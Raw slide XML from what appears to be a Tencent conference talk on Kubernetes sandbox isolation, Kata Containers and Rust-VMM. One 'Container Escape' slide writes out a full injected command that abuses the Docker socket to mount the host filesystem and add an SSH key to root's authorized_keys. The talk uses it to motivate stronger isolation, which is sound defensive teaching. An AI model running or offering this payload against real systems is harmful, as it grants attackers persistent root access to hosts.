          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="001F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Memory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BC846E2-3156-F447-BDA0-B66020207AFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5944975" y="1403042"/>
            <a:ext cx="1217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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Guest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VM</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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718D7B2C-1E48-594E-B728-AAE8E05D5A2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7017179" y="2292080"/>
            <a:ext cx="0" cy="3278504"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850"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3FB16C34-2A22-9D4B-9AE4-687307AC91FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8574309" y="5109102"/>
            <a:ext cx="0" cy="491462"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850"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04A0ECA0-6F03-9E4E-B582-94AD8043B3E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10118187" y="5109102"/>
            <a:ext cx="0" cy="491462"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850"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4CBBB31B-50A2-D740-A6C4-D6D73DB73A05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8473634" y="2275650"/>
            <a:ext cx="0" cy="491462"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850"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79CEF61D-FC9D-3F46-AEFC-7AC48A65899C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9892900" y="2275650"/>
            <a:ext cx="0" cy="491462"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850"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3B9D24FC-14FB-3944-B208-832F53994E8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2654292" y="1480658"/>
            <a:ext cx="2039187" cy="696169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2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8386134-1247-674C-8A55-05F572B3B8B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2939281" y="1461484"/>
            <a:ext cx="15559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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>containerd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+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-runtime</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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574C40F5-5F50-0E44-9F7B-18F77BD521CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="132" idx="2"/>
            <a:endCxn id="59" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4606623" y="1244089"/>
            <a:ext cx="1774853" cy="3640327"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="41275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D82D6DE4-B36B-EA4C-A749-A5F36C433060}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="132" idx="3"/>
            <a:endCxn id="122" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4693479" y="1828743"/>
            <a:ext cx="1251496" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FEBF0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Picture 135">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{630E54C3-7388-7747-B215-AA878983D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53" y="1165947"/>
            <a:ext cx="1789173" cy="1355434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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EDF0158C-1A57-C545-87EE-64E450A23057}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836800" y="1843664"/>
            <a:ext cx="734366" cy="0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F1409432-C143-0F4C-9673-78D66CF2AC32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744845" y="1474332"/>
            <a:ext cx="77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create</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN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4E29BA2-1DF3-0B47-99BB-D7A1D9756196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4886819" y="3609478"/>
            <a:ext cx="906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start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>VM</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="1600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C7E5FDE-D59D-7649-A8D0-A2D69635A5D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4698579" y="1463847"/>
            <a:ext cx="10765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start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="16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6AE115A-3AEF-3244-89FF-B49DAD68A7D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4430016" y="2286731"/>
            <a:ext cx="1547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create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>container</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="16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F8BD25F-2E87-344B-A779-91DC5E05D93F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4691178" y="1906318"/>
            <a:ext cx="1083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start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>agent</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="16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88173E2-1666-824E-9177-114C07F9144F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362626" y="3387455"/>
            <a:ext cx="2717364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cat &lt;&lt; EOT | tee </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>nginx-untrusted.yaml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 err="1"/>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>: v1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>kind: Pod</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>metadata:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>  name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>-untrusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>  annotations: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io.kubernetes.cri.untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>-workload: "true"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>spec:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>  containers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>  - name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>nginx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    image: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>nginx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EOT</a:t>
            </a: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80368B80-4012-B342-AF9C-77E14BEFB03B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="136" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1025339" y="2521381"/>
            <a:ext cx="1" cy="866076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B4107C91-F5EC-0744-921C-08A651A73D4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11268823" y="3814254"/>
            <a:ext cx="710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Rust-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VMM</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill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491BB3BD-7CB2-BE40-83A4-77506B9FA9B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403835" y="3158586"/>
            <a:ext cx="4575439" cy="1905296"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
            <a:prstDash val="lg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267081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F278A-8D37-D04F-9007-1C97CD5442CC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79D177-E10C-204C-A13D-CD0973406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8711"/>
            <a:ext cx="12192000" cy="574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1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140D6-D15E-874C-8BEE-67C83B80E9E7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592D4A-DFFF-5849-A214-2DB1BB014FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414272" y="1865376"/>
            <a:ext cx="920437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Extend Rust-VMM to support</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>networking and storage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Security policy integration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dirty="0"/>
              <a:t>Develop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>a new fully Rust-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>runtime for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>edge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>computing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Support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>live migration</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1406264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08220-08C0-0445-9D0D-552E69864834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2227539" y="516830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>
                <a:solidFill>
                  <a:srgbClr val="4362C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Thanks!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rgbClr val="4362C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74B6B9A-4238-7945-AC30-99B44CD78758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543595" y="21060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Learn more about TKE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     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://cloud.tencent.com/product/tke</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/tkestack/tke</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial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Join us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2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://careers.tencent.com/home.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc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FDFF3D16-EB86-C24E-B4D6-20324A9DE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6147" y="1848689"/>
            <a:ext cx="4518434" cy="451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822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4723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4AA1DF-BB70-7740-B549-1371A8AB4E54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E6744B-596A-CA48-A096-E7B73039D81D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3055442" y="6427566"/>
            <a:ext cx="7926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https://kccncchina2018english.sched.com/event/FuLz/layers-of-isolation-in-kubernetes-tim-allclair-google</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN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622F0A-2A0F-094A-89D2-76EDF63EB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306" y="2329595"/>
            <a:ext cx="7522266" cy="4131171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C0C5B1B-FBA0-734B-BE09-F2C31FF67FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7055972" y="3717345"/>
            <a:ext cx="1333956" cy="1476980"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="317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6A913B-296B-7348-8EAE-40E3DDEE0147}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296562" y="1254799"/>
            <a:ext cx="111087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Kubernetes has many layers of isolation, but we will focus on pod-to-pod isolation in this talk, AKA Sandbox Isolation. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1598046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6CC437-E610-AC44-A1B9-53CC07741C77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862903" y="1430710"/>
            <a:ext cx="74329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N" altLang="zh-CN" sz="3200"/>
              <a:t>Container</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Escape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F8A340-DCE5-FD44-9FE7-CF59AA5DA5C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1614931" y="3642187"/>
            <a:ext cx="985891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docker.vh.neargle.com:8888/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>command_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=python3 -c "import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>docker;client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>docker.DockerClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>base_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:///var/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>docker.sock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>');data = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>client.containers.run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alpine:latest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>', r'''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -c \"echo '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh-rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> root@620e839e9b02' &gt;&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/root/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\" ''', remove=True, volumes={'/': {'bind': '/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/root', 'mode': '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'}})"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15816F-7D27-604C-9BA3-1FD998D69181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1221022" y="2015485"/>
            <a:ext cx="63010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System Font Regular"/>
              <a:buChar char="−"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CVE-2018-14634</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Integer overflow vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="−"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CVE-2016-5195</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Dirty COW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="−"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CVE-2019-5736 Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>runc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>vulnerability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="−"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CVE-2019-14271 Docker CP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>vulnerability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153378E-8AB9-4946-AE21-7F1B483226FD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 Isolation Challenges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45EFFD-1063-C64A-834D-FAC64E441DD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="862903" y="5035788"/>
            <a:ext cx="74329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/>
              <a:t>Noisy neighbor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2EA8F8-C46D-A04A-8202-86A1B9DBECE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1221022" y="5574397"/>
            <a:ext cx="10707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System Font Regular"/>
              <a:buChar char="−"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>performance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CPU,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Memory,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Bandwidth,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IO,</a:t>
            </a:r>
            <a:r>
